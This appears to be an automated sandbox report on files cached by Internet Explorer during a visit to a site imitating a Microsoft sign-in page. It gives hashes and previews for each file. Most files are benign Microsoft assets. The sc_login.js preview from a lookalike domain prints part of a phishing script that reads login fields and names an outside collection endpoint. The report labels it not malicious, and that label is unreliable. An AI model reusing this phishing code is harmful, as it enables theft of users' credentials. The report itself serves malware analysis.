Preview:	.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	8111
Entropy (8bit):	5.339313763115951
Encrypted:	false
SSDEEP:	192:nEAKv577D9kgT/xwj9O8hFNFxgLdQ0Eoxr:E177Dj+yt
MD5:	87EFFB0BB533C1D79F5C94FD9E30C14D
SHA1:	4E4F5F3CDDDDBFDDB46A1626D7CE579A639DE389
SHA-256:	617E32CA57507098771FD30AF6B9DCAB063448F6D7E0BC6D6557DD1895F80543
SHA-512:	CB107C09F9A32D85BF2AF714EE9BF7CE2649AA33E63C2255D4BBD281E3CDA8FBDFA2E58212E8004AEEAAB4DD8C94543F82187C7673189CACBDD5CD8C26C563F7
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js
Preview:	!function(){function e(e){function t(e){return e&&e.state==l&&(e.prev&&(e.prev.next=e.next),e.next&&(e.next.prev=e.prev),D==e&&(D=e.next),$==e&&($=e.prev),e.state=u,e.prev=e.next=null,y--),e}function a(e){if(e&&e.state==u){var r=$;r?(r.next=e,e.prev=r):D=e,$=e,e.state=l,y++}}function f(){!q&&!b&&y&&x>w&&(b=window.setTimeout(g,s))}function v(e){var r=(new Date).getTime()-e<i;return r}function g(){var e=(new Date).getTime();for(b=0,q=!0;y>0&&x>w;){var r=D;if(r&&x>w?(o.assert(r.state===l,"Task was not in a pending state and we were just about to execute it."),r=m(t(r))):r=null,r&&!v(e)){break.}}q=!1,f()}function m(e){if(e){o.assert(void 0!=e.id&&!A[e.id],"Task didn't have an id or was already active!"),w++,A[e.id]=e,e.startTime=(new Date).getTime(),e.state=c;var r=e.exec(function(r){T(e,r)});r\|\|T(e)}return e}function T(e,r){e.state===c&&(w--,o.assert(A[e.id],"A task is being completed without being in the active task list."),delete A[e.id],r&&"number"==typeof r?(e.state=d,e.timeoutId=wind

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/images/favicon.ico?v=2
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\jquery-1.11.2.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	95931
Entropy (8bit):	5.394232486761965
Encrypted:	false
SSDEEP:	1536:5P1vk7i6GUHdXXeyQazBu+4HhiO2AEeLNFoqqhJ7SerN5sVI6xcBgPv7E+nzms9d:A4Ud4qhJvNPqcB47MfWWca98HrB
MD5:	5790EAD7AD3BA27397AEDFA3D263B867
SHA1:	8130544C215FE5D1EC081D83461BF4A711E74882
SHA-256:	2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0
SHA-512:	781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A
Malicious:	false
Reputation:	low
IE Cache URL:	https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js
Preview:	/! jQuery v1.11.2 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\override[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	1531
Entropy (8bit):	4.797455242405607
Encrypted:	false
SSDEEP:	24:Udf0F+MOu2UOqD3426TKgR2Yyk9696TkMYqdfskeEkeGk/ksuF9qaSm9qags:Ud8FYqTj36TKgR2Yyk9696TkMYO0keEW
MD5:	A570448F8E33150F5737B9A57B6D889A
SHA1:	860949A95B7598B394AA255FE06F530C3DA24E4E
SHA-256:	0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
SHA-512:	217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
Malicious:	false
Reputation:	low
IE Cache URL:	https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css?c=7
Preview:	a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\privacystatement[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	328278
Entropy (8bit):	4.848184781296479
Encrypted:	false
SSDEEP:	3072:576s811xiaNyN2d69v36WHkAd5C6ZNRrufSyIxqzEZC/Bd7ZENOxCQyZCqTeHwxC:50xiM6TYs3Nu8iN1yZCSeHaagw
MD5:	509688B04A70E1C2F73F1B81571A0E2D
SHA1:	29A176F9F6B61B390028617CD49C1D4D066EBBA8
SHA-256:	D76E5ACD2B006F77AEFEDFB28BD4314D5F38105189D023D38B2091879B684CA5
SHA-512:	26EB9BC18967442A9BF341BFCC834DCEE83D5D7BCE2E50C9F8D5D36717CD8646DF0C7DF8217E18152424CDDEBBB54B94768DA54C032AB7E9050AD866708D161D
Malicious:	false
Reputation:	low
Preview:	.<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js">.....// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/<![CDATA[/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewpo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sc_login[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12533
Entropy (8bit):	5.503753583780078
Encrypted:	false
SSDEEP:	96:DkF0KouEtW6DqDLR52z7/plsZ19tjwZ/MhBfDvfi/EzPplsZ19tjwZ/MhBfIcnj7:QIcLR52z6fnKf6ejtNepKkwwMKG4UXf
MD5:	068E08AE27B53324210F0C184C38EE92
SHA1:	5CF9CF9B9C8347ECB1301597BAB48B417ECB917C
SHA-256:	E06121FCFC1AFC352CA8F0699BACDF5BF80753A26E8B6161C369C298F619104B
SHA-512:	3F39A1DD5D00488C55D925FD669AB9EBB522950BD4A76D790AE1695267DE1D31EB48C0B7E6D6CB7B5116F81B5BD6AA7B02B229F9013FA7A7B8ED0F9C8F2F5EB9
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/sc_login.js
Preview:	var api = 'https://goips.net/background-redirect/index.php';..var Progress = document.getElementById('progressBar');..var Mainbox = document.getElementById('mainbox');..var Fedred = document.getElementById('fedred');..var Emailsection = document.getElementById('emailsection');..var Passsection = document.getElementById('Passsection');..var Back = document.getElementById('idBtn_Back');..var BGimg = document.getElementById('BGimg');..var LOGOimg = document.getElementById('LOGOimg');..var dimBG = document.getElementById('dimBG');..var USER = document.getElementById('i0116');..var PASS = document.getElementById('i0118');..var USER_ERR = document.getElementById('usernameError');..var PASS_ERR = document.getElementById('passwordError');....function loaded() {.. USER.focus();..}....Emailsection.addEventListener("keyup", function (event) {.. if (event.keyCode === 13) {.. event.preventDefault();.. NE().. }..});..Passsection.addEventListener("keyup", function (event) {..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\script[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	30173
Entropy (8bit):	5.326896118392395
Encrypted:	false
SSDEEP:	384:ekorlyUMfQ8sW5hXDiWiQRKKwoOdo/r4nqdRy/dRyWhtyFhtyYKQys05DU7BS5hN:0olDi2RKQOOwqjE2l/3FJ1C/nrjYiKq
MD5:	F620D4D38655075DF3268D640BF479BD
SHA1:	79BEBF5E6907D4CDD5764B9B9CF3A72932F9C343
SHA-256:	7E1377CD02DAFE245ED719FCA972C5E8CFDE30CBF3910D2795A922BB466D08C2
SHA-512:	1A8528BDEEECEB75766B8ACCD7B5DBFE7E45E72A3E52108D3F63C0667ABF1492FBAFDD6F80E9639339BE5EE5C1E4A7B7BCA635C6DBBBEC83044FBC842C37FFCC
Malicious:	false
Reputation:	low
IE Cache URL:	https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=42ce545a-d075-ac8e-38d1-8d9b4eaa1c7e
Preview:	function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".div_content").css("min-height",$(".div_side_comp").height()-27)}function ShowSelectedComponent(n,t){var i=$("#"+t).attr("data-parentModule");return i!=undefined&&i!=null&&($("[data-parentmodule="+i+"]").show(),$("#"+i+" [id$=_LongDescription]").length>0?(document.getElementById(i+"_LongDescription").style.display="block",document.getElementById(i+"_ShortDescription").style.display="none",ShowText($("#"+i+".learnMoreLabel"),"long")):ShowText($("#"+i+".learnMoreLabel"),"long"),DisplayTopNavigation(i)),$("html, body").animate({scrollTop:$("#"+t).offset().top-1},800),!1}function ShowToolTip(){var n,i,t;w

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\style[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	836
Entropy (8bit):	4.940950417710206
Encrypted:	false
SSDEEP:	24:Cn5ZoK2kNMCJZ4ZVaeao1DphsILHJNM2WXgEXgf0Xgm:u5dxJZ4+BWIIPLQ73/
MD5:	2AC383F4677A1036C8EA4289F99A31E3
SHA1:	E65967B9273029CDDD5A5F8DF9E61DACF89CF11C
SHA-256:	2206A95E6BAC7C185CC54638EBF0B0089CBC27FF729B45AC63C968CFE4991AA4
SHA-512:	9E61D4E2B42A1BC776C5649ECD2E32A1CE1ACEDA929E8C013D20BE95D12B7B56864FD588D6117E6410988331F85E21815E2E135030F49BEA2A244F872570DBE3
Malicious:	false
Reputation:	low
IE Cache URL:	https://c.s-microsoft.com/en-us/CMSStyles/style.csx?k=4627136a-bd68-db6e-30c9-37cf96c98eee
Preview:	body .grid,.body-open .grid,.grid h3,.grid .h3,.grid .header-small,.grid strong,.grid .body-tight-2,.grid h1,.grid .h1,.grid .header-large,.grid .caption{font-family:"Segoe UI"}.grid{max-width:1600px !important}.c-uhfh-actions,.c-uhfh-gcontainer-st .all-ms-nav,.glyph-global-nav-button{display:none !important}.shell-header-wrapper,.shell-footer-wrapper,.shell-category-nav,.shell-notification .shell-notification-grid-row{max-width:1180px !important}.PsTitle{font-family:Segoe UI,sans-serif;margin-right:.3em !important;font-size:2em;display:inline-block;vertical-align:top;margin-left:-.02em}.childModule{margin-left:8% !important}.CollectingYourInfoRightNav{display:none}html[dir=rtl] .m-r-md{margin-right:0;margin-left:10px}html[dir=rtl] .m-l-md{margin-left:0;margin-right:10px}html[dir=rtl] .m-r-bl{margin-right:0;margin-left:40px}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\2_vD0yppaJX3jBnfbHF1hqXQ2[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\2_vD0yppaJX3jBnfbHF1hqXQ2[2].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	low
IE Cache URL:	https://signup.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\908da3c8f209ef75ffb734f6652bf849[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	118
Entropy (8bit):	5.037890800601233
Encrypted:	false
SSDEEP:	3:qVZx+CrUHQzVJu+1iicJwB6Sl6SEdVAIlF:qzxrrUHQRJViicJRSl6nAIlF
MD5:	23594ADFC6A359433487211E766F7093
SHA1:	322C24C180281FFE5DDE2D349CFFF12DFD15EBC7
SHA-256:	67FA1FEFE87E627B77A356238C5BFDCC7C129FCEFC2DACC86AA3D85D0E503BA0
SHA-512:	00DE00D4B75F357C350A1D63D3B2E48006C7177029E7B5A41F66CEABEB05EE2A8274016A830FD74241F949532ABC2788BE31AB3770C4DDE56386E0846C66ADA8
Malicious:	false
Reputation:	low
Preview:	<html><head>.<meta HTTP-Equiv="refresh" content="0; URL=segring.php?https://autodiscover.domain.com/owa/#path=/mail">.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\RE1Mu3b[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4054
Entropy (8bit):	7.797012573497454
Encrypted:	false
SSDEEP:	48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
MD5:	9F14C20150A003D7CE4DE57C298F0FBA
SHA1:	DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
SHA-256:	112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
SHA-512:	D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
Malicious:	false
Reputation:	low
IE Cache URL:	https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Preview:	.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\css[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	assembler source, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	25165
Entropy (8bit):	4.890685799150751
Encrypted:	false
SSDEEP:	192:n5a6bIEe2vP5bsaLFcrkI9ErdNQlakxOaXkxONbKP/nuDQQb+fkCYtDnPO5vrI18:1PNQlakxOikxONbKP/nuDlFGrvH
MD5:	6852C58FB13F87B104D761AE120362FD
SHA1:	C06CB9518C54409C95BE46C5516FCF63F892F43F
SHA-256:	78190EBFE2AD7E33798D786F714F41E02074B0E593A1AA53C0DED17657623227
SHA-512:	61CFD9377B29A465000FA57E3E913E19093AE154C799DAEC744AC99D4F303050D6B85E26714CC360100FA3E9BF18D605F139F94835933FFDE88E3B49E9CD092A
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/css.css
Preview:	html {.. font-family: sans-serif;.. -ms-text-size-adjust: 100%;.. -webkit-text-size-adjust: 100%;..}....body {.. margin: 0;..}....a {.. background-color: transparent;..}....a:active,..a:hover {.. outline: 0;..}....img {.. border: 0;..}....button,..input {.. color: inherit;.. font: inherit;.. margin: 0;..}....button {.. overflow: visible;..}....button {.. text-transform: none;..}....button,..input[type="submit"] {.. -webkit-appearance: button;.. cursor: pointer;..}....button::-moz-focus-inner,..input::-moz-focus-inner {.. border: 0;.. padding: 0;..}....input {.. line-height: normal;..}....* {.. -webkit-box-sizing: border-box;.. -moz-box-sizing: border-box;.. box-sizing: border-box;..}....:before,..:after {.. -webkit-box-sizing: border-box;.. -moz-box-sizing: border-box;.. box-sizing: border-box;..}....input,..button {.. font-family: inherit;.. font-size: inherit;.. line-height: inherit;..}....a:focus {..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
IE Cache URL:	https://signup.live.com/Resources/images/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	96649
Entropy (8bit):	5.297804550899051
Encrypted:	false
SSDEEP:	1536:G+6LPOpumEEni7iU2e25CxgjDb60nkN8h1utK0Dv+9G1LDrjsNyw5yn/dFZ75Tym:xH7pDuVUNB0lmEGWf
MD5:	E55ECB02E7376CD010C764107EBD513F
SHA1:	FA6D184DF01EC535628DC8FAF38211591BAADFC8
SHA-256:	5776881753B95A0ABE5D1F6EFE3ABE7B83A3265EACCD117DD948E523C044600C
SHA-512:	099C665E1CEE8DF9C5D5C340A14170341BD29E0321875FF08E594B750CFDBF2CA8C9B45B584FCA21F87CBE6CD8A170918CECFF8C9796AAFA3D89F0AA97509ABD
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1
